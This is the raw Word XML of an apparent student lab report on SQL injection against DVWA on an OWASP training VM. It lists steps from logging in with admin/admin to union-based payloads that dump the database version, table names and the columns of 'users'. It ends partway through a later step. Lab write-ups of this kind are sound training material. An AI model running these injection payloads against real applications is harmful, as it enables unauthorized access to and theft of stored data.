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526B7" w14:textId="76DBF62E" w:rsidR="00D10246" w:rsidRDefault="00D10246" w:rsidP="00D674E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D674E3"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mr-IN"/>
        </w:rPr>
        <w:t>SQL injection report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F803E0A" w14:textId="77777777" w:rsidR="00D674E3" w:rsidRPr="00D674E3" w:rsidRDefault="00D674E3" w:rsidP="00D674E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771DE15B" w14:textId="323A15AD" w:rsidR="00D10246" w:rsidRPr="00D674E3" w:rsidRDefault="00D1024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t>Step1- put owasp’s ip in the kali browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B50B3A" w14:textId="4FB80C99" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00865AC2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58240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ECC849B" wp14:editId="15E47DF1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>34290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="32537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81DE0" w14:textId="29E22673" w:rsidR="00D10246" w:rsidRPr="00D674E3" w:rsidRDefault="00D1024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>Go to the DVWA for login purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E9C62B" w14:textId="1A6448E6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44D5AE7" w14:textId="76A4FDFF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B114AD" w14:textId="4E730032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CDB65B7" w14:textId="77D9F85E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01A14A8" w14:textId="039710BB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569830A" w14:textId="4BD50C2E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428B4F86" w14:textId="7576AA48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646F8DDB" w14:textId="26A1F496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623C0D63" w14:textId="0E776831" w:rsidR="00D10246" w:rsidRPr="00D674E3" w:rsidRDefault="000D0F3F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DB35984" wp14:editId="29F192B9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>525780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="313817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0246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Step2- Login </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D10246" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D10246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using “admin” as a username and “admin” as a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27880974" w14:textId="28DF699B" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00865AC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DE31735" w14:textId="560FA084" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00D1024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>We have successfully logged in here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E193D" w14:textId="200A667D" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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70528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28953B38" wp14:editId="1D44E8B1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>312420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="28460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72690" w14:textId="04007162" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00865AC2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6210AE26" w14:textId="24679F94" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00865AC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661AA03" w14:textId="5BC4063C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A302123" w14:textId="47A79EC9" w:rsidR="00D10246" w:rsidRPr="00D674E3" w:rsidRDefault="00D1024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>St</w:t>
      </w:r>
      <w:r w:rsidR="00D14C96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ep3- go to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D14C96" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D14C96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injection tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C105FD9" w14:textId="46E5C890" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96" w:rsidP="006606FE">
      <w:pPr>
        <w:ind w:left="360"/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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7331024F" wp14:editId="5AB3FF55">
                <wp:extent cx="307975" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25" name="Rectangle 25" descr="blob:https://web.whatsapp.com/1c7f5d12-09c1-4746-abad-4f804d7867e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F000D2" id="Rectangle 25" o:spid="_x0000_s1026" alt="blob:https://web.whatsapp.com/1c7f5d12-09c1-4746-abad-4f804d7867e3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rIP5gIAAAQGAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtu1DAQfUfiHyy/Z5NsvZtN1GzV7gUh&#10;FagofIATOxuLxA62d9OC+HfGzl7bFwTkIbJn7DNzZo7n+uapbdCOayOUzHE8ijDislRMyE2Ov35Z&#10;BzOMjKWS0UZJnuNnbvDN/O2b677L+FjVqmFcIwCRJuu7HNfWdlkYmrLmLTUj1XEJzkrpllrY6k3I&#10;NO0BvW3CcRRNw15p1mlVcmPAuhyceO7xq4qX9lNVGW5Rk2PIzfq/9v/C/cP5Nc02mna1KPdp0L/I&#10;oqVCQtAj1JJairZavIJqRamVUZUdlaoNVVWJknsOwCaOXrB5rGnHPRcojumOZTL/D7b8uHvQSLAc&#10;jycYSdpCjz5D1ajcNBw5G+OmhIIVjSoy1x0D7el5Mepr6AjtOk8kLpNqwuJxEKVlHJCETANaUBaQ&#10;ahYRlsymCb9yte7hOoR87B60q5bp7lX5zSCpFjVE5Lemg9igI0jlYNJa9TWnDEjHDiK8wHAbA2io&#10;6D8oBsnTrVW+E0+Vbl0MqDF68g1/PjacP1lUgvEqStIEOJbg2q9dBJodLnfa2HdctcgtcqwhOw9O&#10;d/fGDkcPR1wsqdaiacBOs0ZeGABzsEBouOp8LgkvkZ9plK5mqxkJyHi6Cki0XAa36wUJpus4mSyv&#10;lovFMv7l4sYkqwVjXLowB7nG5M/ksH84g9COgjWqEczBuZSM3hSLRqMdheey9p8vOXhOx8LLNHy9&#10;gMsLSvGYRHfjNFhPZ0lA1mQSpEk0C6I4vUunEUnJcn1J6V5I/u+UUJ/jdAK69XROSb/gFvnvNTea&#10;tcLCQGpEm+PZ8RDNnAJXkvnWWiqaYX1WCpf+qRTQ7kOjvV6dRAf1F4o9g1y1AjnBQILRCYta6R8Y&#10;9TCGcmy+b6nmGDXvJUg+jQlxc8tvyCQZw0afe4pzD5UlQOXYYjQsF3aYddtOi00NkWJfGKlu4ZlU&#10;wkvYPaEhq/3jglHjmezHoptl53t/6jS8578BAAD//wMAUEsDBBQABgAIAAAAIQDyXa4d2QAAAAMB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGL2I2iUmI2RQpiEaE01Z6n2TEJZmfT&#10;7DaJ/95RD3qZx/CG977JFpNr1UB9aDwbuJoloIhLbxuuDLxuHy/noEJEtth6JgOfFGCRn55kmFo/&#10;8oaGIlZKQjikaKCOsUu1DmVNDsPMd8TivfveYZS1r7TtcZRw1+rrJLnTDhuWhho7WtZUfhRHZ2As&#10;18Nu+/Kk1xe7lefD6rAs3p6NOT+bHu5BRZri3zF84ws65MK090e2QbUG5JH4M8W7md+C2v+qzjP9&#10;nz3/AgAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHASsg/mAgAABAYAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAPJdrh3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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii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54140B12" wp14:editId="5F4DC957">
            <wp:extent cx="5943600" cy="3742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4B15" w14:textId="4D350AFE" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault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6F38C1E" w14:textId="5B39111E" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C9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Step4- use this code </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>“ ’</w:t>
      </w:r>
      <w:proofErr w:type="gram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or 1=1#” to vomit data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD25038" w14:textId="4631EAC4" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00865AC2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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF35EC3" wp14:editId="79873454">
            <wp:extent cx="4511431" cy="1120237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85D5" w14:textId="3752A103" w:rsidR="00865AC2" w:rsidRPr="00D674E3" w:rsidRDefault="00865AC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77F7C641" w14:textId="777DA777" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault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A8E8A2D" w14:textId="3957A342" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault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67B683F" w14:textId="375AFCFF" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault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4C5313E2" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C9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Step4 OUTPUT- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C710E6D" w14:textId="3F6CCF22" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C9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we got the first name and username after putting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>“ ’</w:t>
      </w:r>
      <w:proofErr w:type="gram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or 1=1#” this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294FC88" w14:textId="16866CA1" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00EF572C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68480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40DE5E43" wp14:editId="6FB82BF3">
            <wp:simplePos x="914400" y="1203649"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2987299" cy="3657917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29F86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ED54507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28549BA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781ACB2A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7FD24AF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9D2068E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0A1F51D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90A6479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C3B7E5C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6A234C89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E021FED" w14:textId="673C1954" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault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45AFAAB" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault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7A4AB7F" w14:textId="4A0A917E" w:rsidR="00EF572C" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96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br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="127C5E93" w14:textId="4844F209" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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18062BCC" w14:textId="3FCAF37F" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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67EC266D" w14:textId="698B14E3" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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17AD3AE2" w14:textId="6BB8B196" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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2781BE41" w14:textId="376C99B5" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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5C518347" w14:textId="3E26226B" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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580344BA" w14:textId="77777777" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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01AC7AD3" w14:textId="09C7220B" w:rsidR="00EF572C" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96" w:rsidP="006606FE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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step5- to get database and versions we have entered </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 union select version(),database()#” this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69451FEA" w14:textId="107075F4" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00EF572C" w:rsidP="008D65FB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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E89D236" wp14:editId="68525408">
            <wp:extent cx="2712955" cy="32464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80F" w14:textId="2479A1E9" w:rsidR="00EF572C" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C9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Step5 OUTPUT- we got database name as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dvwa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and version as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ubuntu12.6-log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EC39F" w14:textId="4569D813" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00EF572C" w:rsidP="008D65FB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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F4FFB3" wp14:editId="63024BD2">
            <wp:extent cx="2979678" cy="36655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4DDA" w14:textId="7A6E3B6A" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96" w:rsidP="006606FE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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step6- to find the tables from dvwa database we have entered </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 union select 1,table_name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'# “this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA4352" w14:textId="43259DB2" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96" w:rsidP="00D14C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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151F87B7" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96" w:rsidP="00D14C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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7163D214" w14:textId="4A8ECF0F" w:rsidR="00EF572C" w:rsidRPr="00D674E3" w:rsidRDefault="00703599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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562E9CDF" wp14:editId="454A32E2">
            <wp:extent cx="5943600" cy="42773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4CD0" w14:textId="5122C1DB" w:rsidR="00703599" w:rsidRPr="00D674E3" w:rsidRDefault="00703599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1FEF2BC" w14:textId="089320DB" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96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F601DC5" w14:textId="7562C87C" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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9B2268B" w14:textId="727D991B" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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7678F40" w14:textId="3AEF8090" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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123E6E3" w14:textId="295D4C63" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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7B483519" w14:textId="77777777" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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6BEE600" w14:textId="77777777" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96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>Step6 OUTPUT- we have got 2 tables under dvwa database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9D2D3" w14:textId="77777777" w:rsidR="008D65FB" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96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>Table1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>guestbook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 Table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B486908" w14:textId="59648A3C" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB" w:rsidP="008D65FB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71552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DFE32BC" wp14:editId="0CA9B920">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>251460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="1881505"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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4FB3" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D73DC8E" w14:textId="4AC096C3" w:rsidR="002E4FB3" w:rsidRPr="00D674E3" w:rsidRDefault="002E4FB3" w:rsidP="006606FE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CD71DE6" w14:textId="4CBF44CC" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00D14C96" w:rsidP="006606FE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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step7- </w:t>
      </w:r>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">To find the columns from the table users we have used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=2 union select 1,column_name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>='users'# “ this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B6A497" w14:textId="186F5AC6" w:rsidR="00D14C96" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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72576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DC87CE0" wp14:editId="202C3B64">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>121920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>262890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="359537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B8BF8" w14:textId="1293984A" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C" w:rsidP="008D65FB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5452856" w14:textId="57EDE690" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C" w:rsidP="006606FE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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
